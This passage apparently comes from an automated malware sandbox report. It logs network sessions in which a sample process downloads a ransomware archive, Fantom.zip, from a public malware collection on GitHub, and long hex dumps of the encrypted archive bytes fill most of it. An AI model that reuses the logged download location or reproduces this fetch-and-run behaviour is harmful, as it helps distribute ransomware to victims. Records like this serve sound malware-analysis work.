                                                                                                                                                    2022-09-29 12:58:53 UTC1082INData Raw: e8 3b 83 43 7c c0 eb 31 ba a4 a1 ae df ae 75 3a c4 ff 70 58 8e 50 a1 8c 96 ab 83 09 d0 83 4c d9 b6 71 b5 dc 90 c1 5b a6 d0 08 ad 02 5a 87 36 56 6e 84 a1 8d 16 1c 94 9b c3 db 0c 1a f4 71 20 e8 27 17 63 10 ff ee eb e3 f2 65 2d d9 be d0 4b 7b 7d 29 da ef e1 42 37 3c a5 78 ac 52 1b f0 6a 91 6b 64 78 fc 70 a4 4f e8 05 0e 03 9d 16 5a c6 55 67 ea 85 fb 57 1b ae 66 bf 27 47 01 80 d8 bc 35 49 d3 47 0b a4 06 d2 af 85 87 97 cc ed a1 9b 5d 29 b5 6b ee 5d de ab 5c b0 8d 50 db 0c ff 6d 77 0f 60 ca da fc 62 53 69 d1 6e 24 67 51 2a ad 5b f8 b2 84 cc 9f be 50 6e b1 63 c7 f7 48 37 cf 18 f1 53 a8 49 b8 ee 57 35 c8 15 65 4b c2 04 0c 87 f2 ba 90 04 4d 72 89 bd 6b 1e 4e 1a 93 a9 66 4a c7 1b 64 1c 7c 5a 34 83 a8 a4 16 3b f2 98 b6 8c 6c 34 9e b3 e5 4a 8d c0 30 66 76 06 a1 de c6
                                                                                                                                                    Data Ascii: ;C|1u:pXPLq[Z6Vnq 'ce-K{})B7<xRjkdxpOZUgWf'G5IG])k]\Pmw`bSin$gQ*[PncH7SIW5eKMrkNfJd|Z4;l4J0fv
                                                                                                                                                    2022-09-29 12:58:53 UTC1098INData Raw: 3a 88 29 ac 3a d9 19 67 d4 0b 1e a8 7d 6e 14 f8 37 b8 7b 2e 60 c1 d3 72 89 e8 b3 d6 5d f8 6c b1 4e e9 fe 7e 11 72 ba d7 5b 54 06 96 4a 64 5a 8c 4a ff 2f 49 7d 5f b1 47 3a ea a8 e5 f0 b9 c9 bb b0 70 c2 49 ca 32 4b 10 1d ca c4 40 cd 13 67 3d 21 fe 93 ee c4 75 d5 20 94 e3 f2 6a 46 ab 6a 21 70 32 7e bb 67 68 8c bd 59 b5 bc ab d0 e6 9c 37 46 33 96 2f 0e ef a2 67 ee 4a 4d 6b 42 75 cc 1d f8 01 2d 25 c1 7e 37 a5 fa bc e0 80 0c 08 6a a9 13 2a 33 1c f0 4d 34 00 36 be 77 af 93 db 9f 92 4e d5 96 10 47 47 8a 98 cd ce 35 15 f6 41 1c f3 2d 42 fc 84 b1 ba f7 8f 43 8c fa eb 0d 63 0a d0 55 56 73 2a 43 31 fc d1 38 33 9e 58 43 7b 23 1d 01 48 ce c6 85 65 56 07 cd 3c 27 8f 2a 31 3d 1b 9f 4b 2b 42 4d a0 40 8a 73 c7 21 d6 7c a1 ad 87 51 c4 41 f0 be 7b 87 36 42 8d 7c 9c 96 23 de
                                                                                                                                                    Data Ascii: :):g}n7{.`r]lN~r[TJdZJ/I}_G:pI2K@g=!u jFj!p2~ghY7F3/gJMkBu-%~7j*3M46wNGG5A-BCcUVs*C183XC{#HeV<'*1=K+BM@s!|QA{6B|#


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    21192.168.2.349718140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC1101OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    22140.82.121.3443192.168.2.349718C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC1101INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:53 UTC1102INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    23192.168.2.349719185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC1103OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    24185.199.108.133443192.168.2.349719C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC1103INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 203087
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:53 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6972-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456334.647644,VS0,VE159
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 033aac7bd9a0bfee58edb8ba5e838d9ce8812cde
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:53 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:53 UTC1104INData Raw: 50 4b 03 04 14 00 01 00 08 00 64 01 cd 4c 5a 74 a2 37 b5 18 03 00 00 16 04 00 0a 00 00 00 46 61 6e 74 6f 6d 2e 65 78 65 22 e7 f0 5b 88 6d 31 c8 1f 0b 7d 88 55 e3 33 f2 2a 91 e5 3a 5c 0e c4 5d 37 ee df 6e 5b a7 3d 5a a3 07 6d 88 45 a4 dc 8e 0a a0 0d 92 93 68 24 00 5c 40 19 4d 80 d5 9b c0 88 7e f4 e8 b1 12 2b e0 d8 eb 5f 40 26 3d 64 73 cf d8 7a 1d c8 74 62 56 d5 b5 6b bc c5 66 0c a3 c2 21 35 45 5c c6 a6 10 d6 9a 5f 61 cd b8 bd e2 41 ee 82 d1 88 dd bf 72 be cc b3 c5 72 36 49 19 d7 76 d2 2d 53 e4 de 95 e6 c9 b4 f0 49 f6 d6 ba f6 d0 5f a3 e9 83 90 3f 14 c4 e8 e9 a9 62 03 42 67 dc d3 0d 07 9f 7e 98 1e 50 4b b2 7a 2c 80 44 b5 9f 42 81 88 d5 88 42 ab ab 3c d2 27 98 7c df c6 d3 8e 82 7a 18 17 a0 bc c6 4a cf 60 40 eb 61 1b d0 ed 8e 15 2f 5e 30 68 c8 39 9a 73 d2 34
                                                                                                                                                    Data Ascii: PKdLZt7Fantom.exe"[m1}U3*:\]7n[=ZmEh$\@M~+_@&=dsztbVkf!5E\_aArr6Iv-SI_?bBg~PKz,DBB<'|zJ`@a/^0h9s4
                                                                                                                                                    2022-09-29 12:58:53 UTC1106INData Raw: 9d a1 23 c2 56 51 00 b0 6d 35 4f 92 bb 15 ab 8f bc 79 27 e8 6a 86 71 01 e0 ef 54 14 7b 97 1c c6 c3 7e af 72 ec 05 50 a3 f6 8a 2d 64 ff c0 58 73 a9 45 21 eb af ba f5 c5 c6 25 18 4d bc 96 42 9c 13 e2 e1 44 03 9f 83 bf ad ad 80 b7 a9 69 e6 97 63 4b fa a7 12 a0 e4 b3 07 37 fb 4f b3 e1 64 a6 e5 aa 93 fb 9e 29 7b a9 24 06 f2 e9 3c 73 0a 0e 1e 6b 57 ca 2c 01 96 93 c0 7a fc 38 6c 6d 06 33 41 96 a5 56 5e 35 2b f1 59 02 1b dc 15 b4 f6 be 3d 5a 29 bd f0 a7 1b f7 ab 64 4e e3 7b b5 b5 af aa 28 71 0c 4d 66 5f e2 da 44 63 0d fe 68 83 0b bb 26 40 ae 82 d0 25 85 cb 7b 0c bd 12 6c f8 32 ca fc ec 91 1e 63 10 c3 96 2b bc be 2f 8c b8 e1 74 3f 3f 08 82 ea 66 45 2d 1d 96 cd 52 24 b3 86 f0 01 a1 e7 e1 6a 6c fc ff b2 fd 80 cb d6 7f b8 6e 98 84 ea bd 20 f7 00 05 48 e4 f5 77 2a 41
                                                                                                                                                    Data Ascii: #VQm5Oy'jqT{~rP-dXsE!%MBDicK7Od){$<skW,z8lm3AV^5+Y=Z)dN{(qMf_Dch&@%{l2c+/t??fE-R$jln Hw*A
                                                                                                                                                    2022-09-29 12:58:53 UTC1107INData Raw: 96 bf 66 38 cc 43 d4 13 22 c6 10 02 6f fa 84 7a 7b c3 00 59 d2 cd d8 b9 78 1a 0b c3 fb da 5d ad b1 7b 42 2e 8a 2d 86 d4 41 c7 48 62 82 c5 06 5c e0 65 bb b2 15 0a 45 5e 80 fa 1b 34 a6 68 f2 95 a9 64 c3 cc a1 28 e9 49 b1 09 9b e9 50 1e e9 97 e8 5a ec 6d 95 a6 12 9f 49 d1 35 a9 1b eb 36 0d 53 51 ab 6c d5 d4 04 76 27 29 e7 d4 a3 c1 14 70 55 f2 ac 61 2c ea 9f 3b f9 b6 15 1c 46 7b e0 96 b3 2a 8f 9a 43 e7 fa 4b df 21 bd 48 c6 c1 67 03 f0 3b b8 0a 29 70 42 1c e4 3f e9 5a cc db bd fa 6a 1c c6 08 ec ee 5c f8 a7 69 e3 00 02 32 24 59 e8 d2 49 5f 25 83 ba 3c 70 6e eb 24 10 c1 11 86 6a 1f 22 2e e0 be c9 f4 05 de 52 1b 23 ba 1d 87 39 45 84 fc 2a 54 40 9f 79 52 dc 62 e9 09 82 ad 4e f1 0b 38 8e 96 bd 26 f5 19 4f ec 81 d6 94 bf 51 51 9e 7b 47 3d f4 e4 10 32 b5 50 ca ee 71
                                                                                                                                                    Data Ascii: f8C"oz{Yx]{B.-AHb\eE^4hd(IPZmI56SQlv')pUa,;F{*CK!Hg;)pB?Zj\i2$YI_%<pn$j".R#9E*T@yRbN8&OQQ{G=2Pq
                                                                                                                                                    2022-09-29 12:58:53 UTC1108INData Raw: da a9 e5 4d bd cb 45 0c 40 34 66 b9 88 d0 06 7e 4b 8c 89 ec c1 44 b7 1f bc 02 1d c0 e9 f1 47 55 dd 2b 8a e7 08 01 f6 0f ff 06 98 55 66 28 bd a2 fc cb 7f a8 64 72 5c 52 08 bf d5 f1 14 c8 40 7b 60 d1 94 38 fb a7 c5 e4 6e 92 ce 61 41 5f 6e 27 79 b7 e0 f5 37 2f ef e1 82 4f 3f 05 54 f1 e2 ea 2f 61 9c ea c0 aa 61 dc 6d fc 99 fe 2c 67 7a 9e ec 70 c7 93 1e 03 64 b4 58 63 d6 a9 99 1c c8 b2 cc 7a c6 f6 0d 82 44 07 e5 47 f1 87 26 de 56 ac 55 61 31 bd 8c e3 f0 d3 c4 d1 22 4f 80 99 c9 ea 9d 6f 79 04 51 c8 e7 66 ff a8 b6 1b f6 62 43 b3 5b 96 74 b1 96 57 d6 cd c2 e4 24 4a 90 fd 60 e1 ca fe c0 b0 16 45 e0 2c d9 51 e3 12 3d 8b 98 09 c2 3a a4 12 a9 70 14 8f 37 21 13 66 14 82 e3 3d 0a b8 8b d7 67 c4 78 90 85 3f fa 95 6d 19 7f 07 3f 4b 2f ab 55 ee f5 43 32 64 0d fa 45 b2 e4
                                                                                                                                                    Data Ascii: ME@4f~KDGU+Uf(dr\R@{`8naA_n'y7/O?T/aam,gzpdXczDG&VUa1"OoyQfbC[tW$J`E,Q=:p7!f=gx?m?K/UC2dE
                                                                                                                                                    2022-09-29 12:58:53 UTC1110INData Raw: 33 f5 ca 3b 57 f9 04 3f c4 9f 94 ce 28 77 a4 b7 52 ad 5a fa 98 8d 75 5b e5 bd 8d 2a 9b bf 23 55 83 2c 42 c7 cc f8 97 b3 11 9b a3 fb 71 08 98 5d 1c 03 9d ca bb e3 1e 89 29 42 e6 48 7f 6f fd 92 ca b2 48 b2 64 f2 8b f7 cf bd a4 a9 77 e4 01 57 f2 2a 56 64 11 8d 88 0e 5c 60 71 a9 c4 30 a5 13 10 db 4b 0a 15 a1 bd 50 0e 94 fd 26 98 64 6f 8c 3e 2f 8a cb 27 d0 af be 1e 14 56 5d 41 08 51 59 26 bd 72 e8 44 cd 28 3d 71 6f 8f db 39 a6 5f 7a 48 e9 db 9d 8d 30 c1 dc de 84 55 35 23 ba de 94 a3 ae 83 0e ed d6 b4 f0 f0 7e ee 93 38 e8 14 7a 76 85 6a 9d 58 81 b5 ee 32 ed 52 18 87 aa d0 b1 14 04 45 37 81 54 a1 a3 a5 2c 57 17 c9 a7 a0 9f 8b b1 d2 64 97 f1 ac 27 71 3c 99 1d 96 50 13 9c e7 96 19 3c 1a 91 09 9e 62 91 b8 0b 93 80 6f a2 7c 42 74 d4 28 b4 8e 64 83 65 fb 8f 79 41 28
                                                                                                                                                    Data Ascii: 3;W?(wRZu[*#U,Bq])BHoHdwW*Vd\`q0KP&do>/'V]AQY&rD(=qo9_zH0U5#~8zvjX2RE7T,Wd'q<P<bo|Bt(deyA(
                                                                                                                                                    2022-09-29 12:58:53 UTC1111INData Raw: 2d 29 47 15 79 29 ab 37 7c c1 a3 61 9a 0b ce d5 9f ce 03 be 8e 18 ee 14 e9 94 8b bc 57 e4 85 c6 02 59 d9 0a 0e 6e 4d a8 c8 e8 3f f2 1c fa f8 4d e5 e2 5d eb b3 78 70 4a a0 6c 4c b8 ce 10 ee b2 f8 3a 55 ac 84 00 f9 e9 ff b0 2a 90 97 a3 31 98 48 3f 9b 29 55 c6 ab 4d c6 e6 92 17 db b8 2a 56 90 e7 18 94 cf fd 5d 6e 7f 7c 55 16 1d 67 bd d9 9b 7a 94 58 0d f7 ac b1 4f 10 4d 05 90 74 b7 f8 f6 0e e6 4c 9f 53 5c fc 5a 06 16 1f 77 6b b6 2b 4c 6a 7a c1 4a 22 97 7e c5 14 17 81 e8 80 bc 43 4f a3 a2 4f 51 37 60 fd 94 37 39 94 fe c7 8e 58 44 fe ed cc 35 d2 34 af 8e e7 1d 9e 14 f4 93 d3 b9 72 c7 cb 4a b8 82 d9 5e 0f b4 bf 43 8b 45 14 ef 20 69 e8 fa 87 a5 de 15 93 0e 54 05 d6 c2 77 c8 6c 86 c5 3d f2 17 37 26 8c b5 ff 61 97 42 a7 52 e5 97 e2 c7 24 2e ab ec 7d 65 78 8f 00 54
                                                                                                                                                    Data Ascii: -)Gy)7|aWYnM?M]xpJlL:U*1H?)UM*V]n|UgzXOMtLS\Zwk+LjzJ"~COOQ7`79XD54rJ^CE iTwl=7&aBR$.}exT
                                                                                                                                                    2022-09-29 12:58:53 UTC1112INData Raw: 3b 3c 52 f7 d4 e3 73 31 94 e6 5a 45 61 2e 60 8a 6c 46 ef 41 15 f6 16 1a 47 1b 3f c5 af b1 4a 87 5c a6 8e 4f d5 a3 1f 21 5c 42 54 f0 cd 68 4b a8 18 cf e0 46 4f a0 69 f4 51 d5 15 ce d1 05 a5 09 d1 3c e3 59 26 22 3d d0 88 82 c0 b3 17 b1 cd 51 b2 5a c5 7a da 35 87 37 54 5b 2f 12 e1 7f 9b 7e 17 72 f9 ef c3 28 cb bb 0a 2e dd f2 ce e3 01 fe bd 34 e5 6f 85 78 8b e4 3f e1 f1 6a 1f e7 f3 ac bd 9c 83 dc b5 fc d9 bb d4 b8 98 63 6d c9 6d b8 57 1d 3e 1d b6 db b1 9e 7a 51 bb 5d 98 df f4 99 1f 88 6e ce 76 e0 f2 43 a6 06 ef 45 86 a0 0d 6d 00 0c ce be 0b 5e 4c 6e a9 10 ce 30 b0 60 ce 2c 77 2b 36 f4 e7 3c 15 2a ec 64 7e 37 ce bb f2 5c a9 a7 26 66 ec 9e fb 39 64 8b 29 b2 2d a0 65 5a 48 29 c3 79 2e a4 66 89 97 66 41 8a 5a fb 5c ef dc c8 a0 1f 1c 36 db 21 07 61 29 6f bd db 35
                                                                                                                                                    Data Ascii: ;<Rs1ZEa.`lFAG?J\O!\BThKFOiQ<Y&"=QZz57T[/~r(.4ox?jcmmW>zQ]nvCEm^Ln0`,w+6<*d~7\&f9d)-eZH)y.ffAZ\6!a)o5
                                                                                                                                                    2022-09-29 12:58:53 UTC1114INData Raw: aa 7f 01 94 af 0a 45 e3 61 1d fb b2 db b8 2a 79 94 6f af 4b ea c3 38 df 20 a6 80 44 31 6b 63 59 88 3c bb 65 c6 4d c0 bf 3c 1e 90 28 41 a2 46 f8 97 33 51 3a 99 90 f7 72 03 4a 11 8a ab c7 c0 22 39 e1 20 87 bf 7e 26 85 44 5f 4d 4e 64 82 65 6c df 62 0c d2 5d 56 0b 8a 10 72 df 31 5c 20 d3 00 16 e9 be 00 7c d3 c2 1c 8f a3 da 92 1d 46 2c 4f 0d 4f 7a 4f a4 de 87 ce 33 de 1b f1 8f 2a fe 1b 84 5c 23 70 5c cd 05 8a 34 a3 d9 88 8b 81 19 03 a6 d3 9f c1 5a cd b9 08 d4 4f 24 b9 f7 83 03 27 c3 35 44 fc ce b9 a0 57 e5 14 f1 3d 3a 29 01 a7 80 ca 84 6b 9d a2 a5 d8 9c df 4e 18 79 8b 3a 38 bb 98 af d2 83 3b 69 cf e9 08 5a dd 59 8b 6e f0 37 46 21 91 f6 cd 6b 3b 6c f2 d6 f4 42 6f 20 fe e6 4c 22 34 7e 2d 14 c8 e9 a1 b9 47 6c 1e 49 3f 48 74 ed 85 ff c5 a8 36 72 fc 6f e9 43 53 66
                                                                                                                                                    Data Ascii: Ea*yoK8 D1kcY<eM<(AF3Q:rJ"9 ~&D_MNdelb]Vr1\ |F,OOzO3*\#p\4ZO$'5DW=:)kNy:8;iZYn7F!k;lBo L"4~-GlI?Ht6roCSf
                                                                                                                                                    2022-09-29 12:58:53 UTC1115INData Raw: 6f 4d 39 b6 d8 d4 94 f1 8e 5f 34 24 01 42 b4 ac 31 35 68 22 dd 5c 21 17 36 fc 16 5f 8d 8f a4 6c 6f 18 36 1c 9e 99 f4 d2 f5 56 27 c0 61 da 50 cb 2d 80 86 01 14 ba 5d ae e1 1c 6e 13 ff 63 c3 13 98 79 7b eb 52 fe c7 90 96 fe 55 5a a6 14 77 a0 d3 52 83 38 c7 ea f4 c3 ff a9 bc b6 79 69 ed d6 6a ec f1 62 aa 0c ca fe c1 8e 7b 5d f8 8a ac fb 78 7d fd 01 95 71 bc 40 1a c9 40 e1 52 a3 18 94 17 40 36 ab 69 ed ad 38 0e 39 04 55 20 26 c0 20 2e b5 ab 7e a4 a3 8e 08 50 0b c6 fd d1 47 44 ae 04 f6 01 e3 f0 1b f1 12 21 42 e8 32 ea c3 52 84 d9 66 4d 46 7a ac 38 7f 50 ff 8f 72 10 40 bb a7 f5 37 54 fd d0 1f 74 24 de c2 bd 51 6b 55 9d 64 f0 6a 6e 12 6f b5 57 f9 f3 ea 2e e8 bb 41 d6 e6 6e ba 0a 31 04 6e 04 b7 09 d5 7b cb 7d 8d 2b 0c 23 4b 78 09 d8 89 69 80 b7 8f cd c9 c0 3b 4d
                                                                                                                                                    Data Ascii: oM9_4$B15h"\!6_lo6V'aP-]ncy{RUZwR8yijb{]x}q@@R@6i89U & .~PGD!B2RfMFz8Pr@7Tt$QkUdjnoW.An1n{}+#Kxi;M
                                                                                                                                                    2022-09-29 12:58:53 UTC1116INData Raw: 6a 11 0d 04 f8 40 b1 c4 aa 28 56 f1 91 d6 a8 4c c2 60 90 09 b3 b9 92 79 56 f4 11 93 a7 9e 12 5c fe 82 a2 f7 57 ca 56 3d 79 67 87 29 0e 67 57 0f 58 d7 05 4c 7c 76 e0 ab 5e a5 93 3b ba 04 63 a5 cd 6e 5a 7e 73 58 88 33 71 21 65 58 23 6c 5d b2 a2 af 19 e3 1d f3 74 b5 da 20 7e 22 59 59 fb 5d 1e d6 2d 4f f1 d5 d1 13 78 d8 59 b5 16 d7 b4 fc 47 2c 8b c7 70 3e 12 1c 29 5b f1 cf 0f e6 88 b7 1a 61 c4 25 26 d5 b2 d6 72 ed 9b bd 74 74 b4 3b cd bf 31 5f 08 2b d1 6b e0 c1 ab 1c ce 08 77 53 fa 97 06 96 49 67 6a 77 68 aa ea b8 ac 2a db c7 a9 c1 27 51 d2 45 d5 8a c9 c5 d8 4f 0e 26 56 39 3a 46 c3 9f af f4 6e 8c c7 ba 2e 6f c2 07 12 c0 2a bf 5d 80 cc cf 21 dc fb e6 5d b4 20 96 1b 56 76 78 c8 54 dd b0 49 6f 0c e5 3f cd ce 0f 86 a0 19 69 48 90 9e 19 80 2c 7e 31 a2 de 3b 88 6f
                                                                                                                                                    Data Ascii: j@(VL`yV\WV=yg)gWXL|v^;cnZ~sX3q!eX#l]t ~"YY]-OxYG,p>)[a%&rtt;1_+kwSIgjwh*'QEO&V9:Fn.o*]!] VvxTIo?iH,~1;o
                                                                                                                                                    2022-09-29 12:58:53 UTC1118INData Raw: d9 1b 67 51 39 8b e0 bd 70 e9 e6 ea d3 1f 30 1f f5 24 9c 67 f0 e8 9a fd 20 4a 18 5e b6 64 70 2f 33 c6 f9 b8 63 0e 3e a0 53 a4 04 0b 27 26 ca bf 4c 7b 91 51 21 b7 48 74 21 93 06 ff 99 40 0c 93 b3 54 22 5d db 44 a7 aa 5c a3 3e 28 b4 fa 69 a8 3e 77 5e ae a2 20 04 b7 11 8c 55 e0 ff 96 9b ec 82 d0 28 fc 9c 5c e6 b3 69 e6 f9 2d 43 64 9b 7b 7d 43 ff de 75 c5 05 07 c2 69 cf 61 73 f2 0e 17 4a 51 5c 20 81 35 28 a6 fa 87 be f0 8b 7a e9 54 8a 8d 56 1b 34 2e 2d 8c 70 ce 6d 38 e2 c4 aa e2 f7 17 5c 76 9b 1e b4 32 dd 78 99 3a 8c be 74 27 ef c8 e3 14 28 6f 33 14 74 77 53 c8 ad 13 da 39 b0 ad 59 29 82 02 09 d1 22 2f 54 fe 54 bc 91 ef a3 af 9e 64 ea 5e 2c 79 18 09 e3 50 30 33 bf 68 23 2e 96 5c 8f 3c 91 18 14 d0 0b 00 e8 12 84 53 02 31 a3 8a b0 5f 0b 2e ae fa e8 37 d1 cb 15
                                                                                                                                                    Data Ascii: gQ9p0$g J^dp/3c>S'&L{Q!Ht!@T"]D\>(i>w^ U(\i-Cd{}CuiasJQ\ 5(zTV4.-pm8\v2x:t'(o3twS9Y)"/TTd^,yP03h#.\<S1_.7
                                                                                                                                                    2022-09-29 12:58:53 UTC1119INData Raw: d2 2b 20 5e ed fe b7 e1 d3 11 99 eb a6 21 ac 2a 8e 2f 8f a6 c8 ae 2b 40 73 94 59 54 ba 62 20 12 57 d2 0e 3f 02 16 3b 34 fb 04 f1 04 61 74 bd b2 09 2d 23 c7 7a 53 b8 12 18 8a 35 4d 2f 3b ab e6 83 91 24 e7 a8 ee de a4 88 5d 71 d0 f7 54 0d 05 c7 79 84 9e 6f 44 b4 74 f8 0c d8 d0 f9 59 ef 2d 00 b1 b8 bd 3e 48 7f 8a 3c 5d 71 b3 df 6b 55 17 cb 0f 52 d3 41 10 3c 72 0f 59 fd 26 c6 14 04 69 32 79 0b dc 87 b7 ee 46 11 44 95 11 5c 2e 32 e6 4d b1 fa 82 f9 2c 63 6e c6 8f b4 13 28 48 40 4b 9d ee 5b fc e3 2c 06 8b 4f c6 cd bf 2c 18 a8 fc c9 97 b9 5c b6 b5 d0 65 21 54 5d 15 55 62 6d 65 cd 19 05 66 c9 c8 05 76 50 0a a2 cf 2f 17 7f 00 ce 2e 8a 70 8d 8f 2a 8d a1 83 97 81 2a 28 6d 2a 4d b4 22 e8 6f ea 7b 0e dd 09 a7 0f 8b 42 36 4d 86 b9 c7 4b ac c5 e5 72 af 07 b0 04 1e bf f0
                                                                                                                                                    Data Ascii: + ^!*/+@sYTb W?;4at-#zS5M/;$]qTyoDtY->H<]qkURA<rY&i2yFD\.2M,cn(H@K[,O,\e!T]UbmefvP/.p**(m*M"o{B6MKr
                                                                                                                                                    2022-09-29 12:58:53 UTC1119INData Raw: 42 58 d5 1d f0 9a 1a 66 70 54 02 f7 a8 0b de 95 3b da 29 52 ed cb 1a c7 8b 25 12 74 52 9d dc 34 5f d1 6a 52 db f0 25 cd b5 39 e4 71 fb 23 81 c1 ac be 91 cc 07 bd d6 b9 11 53 29 83 a3 53 20 72 f2 03 ed 57 7a cc 3a 75 34 8b 2d df b6 78 7c 4f 1a b1 1e 04 83 56 37 92 c7 73 be ab 1e a2 3e c0 d1 cc 0d b7 01 3f ae 4f 04 59 10 bf 1f e9 e2 2b 92 8e cb 63 89 f3 70 12 9b c9 28 6f 55 74 c1 e1 39 3e 1e 45 df dd f6 1d ac b0 8b 83 35 f7 d2 be c1 e3 68 ef ef d5 7e 23 9a 06 58 3d 39 70 ba 7b 7c 26 76 72 b4 12 3d 1d 26 5e eb 2c 2d 14 c2 c6 3f 8b e6 28 0f d9 e4 96 77 9f 16 27 c7 f9 21 f4 42 08 9b 10 14 2f c4 82 e0 14 e2 d0 78 20 d0 f0 ee bc 3f 21 35 5d 36 1a 79 06 e8 b5 97 2a 09 2d c3 8f 72 da 25 fa 31 fb 23 88 03 0d c8 90 e3 65 47 3f 65 cf 4f 4c 50 45 f0 fb 4c af 28 b8 e7
                                                                                                                                                    Data Ascii: BXfpT;)R%tR4_jR%9q#S)S rWz:u4-x|OV7s>?OY+cp(oUt9>E5h~#X=9p{|&vr=&^,-?(w'!B/x ?!5]6y*-r%1#eG?eOLPEL(
                                                                                                                                                    2022-09-29 12:58:53 UTC1135INData Raw: 5a 44 2f 0c 35 30 15 3c d2 9d 32 eb 71 e4 20 ed ce 0b de 7f 67 be ba 98 70 e6 b3 5d 04 5e ea da 04 01 ea 07 f9 07 2b 53 5b cd 47 28 7a 1d d9 9c f2 03 fb 52 be a0 df 79 79 32 d1 98 90 72 6b 25 98 90 30 90 73 5b c0 ff 64 99 d6 fd 49 5e 40 42 02 f5 15 da 3e 1e fa 2d 4f 7a 5a eb d6 26 4a 7c a3 92 fe 70 1a 43 68 ad ca 73 f4 de 00 bb 26 d8 c7 06 1d 6c 8e b7 a6 bf 80 d6 9a 12 0d cc 0d e3 b7 9c 54 ed 6e 5d 9f 1b 55 6d 61 f8 56 5e 46 b7 44 0b 16 22 ac 00 b5 9a 40 47 73 f2 e1 c9 4f 6e b9 65 e9 4a 32 95 32 5a 81 04 bc 84 53 b4 67 35 55 ff cb ee e6 57 58 1d f9 bc 18 c1 ed 86 d4 45 7a 2d 33 69 68 03 f1 9f a0 89 f1 f1 c5 4d a5 be f6 bf 85 ec 59 6d 10 7e 1d 9b f9 4d 8b 79 b7 b0 2b 25 d9 a7 03 93 1b 16 08 b7 ab 28 de c1 fc b2 62 2d c3 df bb f4 52 7d c4 fd 48 f1 45 a5 6e
